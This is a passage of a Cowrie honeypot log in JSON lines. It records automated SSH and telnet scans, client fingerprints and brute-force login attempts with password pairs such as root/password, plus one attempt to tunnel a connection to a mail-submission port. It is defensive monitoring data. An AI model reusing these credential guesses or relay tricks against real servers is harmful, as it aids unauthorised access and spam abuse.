istp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:08:16.273067Z","src_ip":"212.227.235.229","session":"8609d359d991"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T04:08:17.747270Z","src_ip":"212.227.235.229","session":"8609d359d991"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:08:19.138259Z","src_ip":"212.227.235.229","session":"8609d359d991"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42616,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf29ddc04652","protocol":"ssh","message":"New connection: 212.227.235.229:42616 (1.2.3.4:22) [session: cf29ddc04652]","sensor":"my-vps","timestamp":"2025-08-31T04:08:19.456922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:08:19.457835Z","src_ip":"212.227.235.229","session":"cf29ddc04652"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:08:19.776314Z","src_ip":"212.227.235.229","session":"cf29ddc04652"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:08:21.095110Z","src_ip":"212.227.235.229","session":"cf29ddc04652"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:08:21.902943Z","src_ip":"212.227.235.229","session":"bfd3e9638eaa"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:08:21.909470Z","src_ip":"212.227.235.229","session":"cf29ddc04652"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":28490,"dst_ip":"1.2.3.4","dst_port":22,"session":"e890e331a194","protocol":"ssh","message":"New connection: 80.94.95.15:28490 (1.2.3.4:22) [session: e890e331a194]","sensor":"my-vps","timestamp":"2025-08-31T04:08:26.771986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T04:08:26.773011Z","src_ip":"80.94.95.15","session":"e890e331a194"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T04:08:26.824171Z","src_ip":"80.94.95.15","session":"e890e331a194"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:08:27.112569Z","src_ip":"80.94.95.15","session":"e890e331a194"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"80.94.95.15","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-31T04:08:27.173607Z","session":"e890e331a194"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-31T04:08:27.224805Z","src_ip":"80.94.95.15","session":"e890e331a194"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:08:27.276480Z","src_ip":"80.94.95.15","session":"e890e331a194"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37702,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a4554d4fcd2","protocol":"ssh","message":"New connection: 212.227.235.229:37702 (1.2.3.4:22) [session: 4a4554d4fcd2]","sensor":"my-vps","timestamp":"2025-08-31T04:08:29.688861Z"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-31T04:08:31.580035Z","src_ip":"212.227.125.160","session":"61db85e8329d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:08:32.980917Z","src_ip":"212.227.235.229","session":"4a4554d4fcd2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:08:32.989971Z","src_ip":"212.227.235.229","session":"4a4554d4fcd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51442,"dst_ip":"1.2.3.4","dst_port":22,"session":"90b7fa578646","protocol":"ssh","message":"New connection: 212.227.235.229:51442 (1.2.3.4:22) [session: 90b7fa578646]","sensor":"my-vps","timestamp":"2025-08-31T04:08:33.931221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:08:34.683864Z","src_ip":"212.227.235.229","session":"90b7fa578646"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:08:34.685035Z","src_ip":"212.227.235.229","session":"90b7fa578646"}
{"eventid":"cowrie.session.closed","duration":"301.3","message":"Connection lost after 301.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:08:37.480414Z","src_ip":"212.227.235.229","session":"e89d0bae8038"}
{"eventid":"cowrie.session.closed","duration":"33.5","message":"Connection lost after 33.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:08:39.955571Z","src_ip":"212.227.125.160","session":"61db85e8329d"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"root123","message":"login attempt [mysql/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:08:40.551965Z","src_ip":"212.227.235.229","session":"90b7fa578646"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:08:42.335292Z","src_ip":"212.227.235.229","session":"90b7fa578646"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41768,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f0662bd2fbf","protocol":"ssh","message":"New connection: 212.227.125.160:41768 (1.2.3.4:22) [session: 6f0662bd2fbf]","sensor":"my-vps","timestamp":"2025-08-31T04:08:56.073850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:08:56.543422Z","src_ip":"212.227.125.160","session":"6f0662bd2fbf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:08:56.544216Z","src_ip":"212.227.125.160","session":"6f0662bd2fbf"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"root123","message":"login attempt [mysql/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:08:58.834919Z","src_ip":"212.227.125.160","session":"6f0662bd2fbf"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:09:00.476385Z","src_ip":"212.227.125.160","session":"6f0662bd2fbf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34646,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9b1b68baac3","protocol":"ssh","message":"New connection: 212.227.125.160:34646 (1.2.3.4:22) [session: e9b1b68baac3]","sensor":"my-vps","timestamp":"2025-08-31T04:09:09.388109Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44571,"dst_ip":"1.2.3.4","dst_port":23,"session":"83c79cf3f6bf","protocol":"telnet","message":"New connection: 212.227.235.229:44571 (1.2.3.4:23) [session: 83c79cf3f6bf]","sensor":"my-vps","timestamp":"2025-08-31T04:09:24.740851Z"}
{"eventid":"cowrie.session.closed","duration":"20.0","message":"Connection lost after 20.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:09:29.380863Z","src_ip":"212.227.125.160","session":"e9b1b68baac3"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-31T04:09:29.878710Z","src_ip":"212.227.235.229","session":"4a4554d4fcd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59176,"dst_ip":"1.2.3.4","dst_port":22,"session":"45eb92d7313a","protocol":"ssh","message":"New connection: 212.227.235.229:59176 (1.2.3.4:22) [session: 45eb92d7313a]","sensor":"my-vps","timestamp":"2025-08-31T04:09:33.783664Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53022,"dst_ip":"1.2.3.4","dst_port":22,"session":"80cb00a45d06","protocol":"ssh","message":"New connection: 217.72.205.35:53022 (1.2.3.4:22) [session: 80cb00a45d06]","sensor":"my-vps","timestamp":"2025-08-31T04:09:34.372031Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:09:34.373184Z","src_ip":"217.72.205.35","session":"80cb00a45d06"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:09:34.548321Z","src_ip":"212.227.235.229","session":"45eb92d7313a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:09:34.549361Z","src_ip":"212.227.235.229","session":"45eb92d7313a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38978,"dst_ip":"1.2.3.4","dst_port":22,"session":"18a9d92d86e3","protocol":"ssh","message":"New connection: 212.227.235.229:38978 (1.2.3.4:22) [session: 18a9d92d86e3]","sensor":"my-vps","timestamp":"2025-08-31T04:09:36.550490Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58936,"dst_ip":"1.2.3.4","dst_port":23,"session":"1997574c3a0a","protocol":"telnet","message":"New connection: 212.227.235.229:58936 (1.2.3.4:23) [session: 1997574c3a0a]","sensor":"my-vps","timestamp":"2025-08-31T04:09:39.699696Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52990,"dst_ip":"1.2.3.4","dst_port":22,"session":"89cc24615d0f","protocol":"ssh","message":"New connection: 212.227.235.229:52990 (1.2.3.4:22) [session: 89cc24615d0f]","sensor":"my-vps","timestamp":"2025-08-31T04:09:39.742016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:09:39.742907Z","src_ip":"212.227.235.229","session":"89cc24615d0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:09:40.071095Z","src_ip":"212.227.235.229","session":"89cc24615d0f"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"P@ssw0rd123","message":"login attempt [mysql/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:09:40.615996Z","src_ip":"212.227.235.229","session":"45eb92d7313a"}
{"eventid":"cowrie.session.closed","duration":1.7610266208648682,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:09:41.460651Z","src_ip":"212.227.235.229","session":"1997574c3a0a"}
{"eventid":"cowrie.login.failed","username":"server","password":"admin123!@#","message":"login attempt [server/admin123!@#] failed","sensor":"my-vps","timestamp":"2025-08-31T04:09:41.685758Z","src_ip":"212.227.235.229","session":"89cc24615d0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58944,"dst_ip":"1.2.3.4","dst_port":23,"session":"29e38e3e06f1","protocol":"telnet","message":"New connection: 212.227.235.229:58944 (1.2.3.4:23) [session: 29e38e3e06f1]","sensor":"my-vps","timestamp":"2025-08-31T04:09:41.809865Z"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:09:42.474714Z","src_ip":"212.227.235.229","session":"45eb92d7313a"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:09:42.606267Z","src_ip":"212.227.235.229","session":"29e38e3e06f1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:09:42.626253Z","src_ip":"212.227.235.229","session":"29e38e3e06f1"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T04:09:43.019330Z","src_ip":"212.227.235.229","session":"29e38e3e06f1"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:09:43.119124Z","src_ip":"212.227.235.229","session":"89cc24615d0f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.0","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:09:44.658509Z","src_ip":"212.227.235.229","session":"29e38e3e06f1"}
{"eventid":"cowrie.session.closed","duration":2.853823184967041,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:09:44.663610Z","src_ip":"212.227.235.229","session":"29e38e3e06f1"}
{"eventid":"cowrie.session.closed","duration":"78.4","message":"Connection lost after 78.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:09:48.061303Z","src_ip":"212.227.235.229","session":"4a4554d4fcd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49672,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2ce1347c060","protocol":"ssh","message":"New connection: 212.227.125.160:49672 (1.2.3.4:22) [session: a2ce1347c060]","sensor":"my-vps","timestamp":"2025-08-31T04:09:55.136030Z"}
{"eventid":"cowrie.session.closed","duration":30.67429208755493,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:09:55.415070Z","src_ip":"212.227.235.229","session":"83c79cf3f6bf"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:09:55.719099Z","src_ip":"212.227.125.160","session":"a2ce1347c060"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:09:55.719878Z","src_ip":"212.227.125.160","session":"a2ce1347c060"}
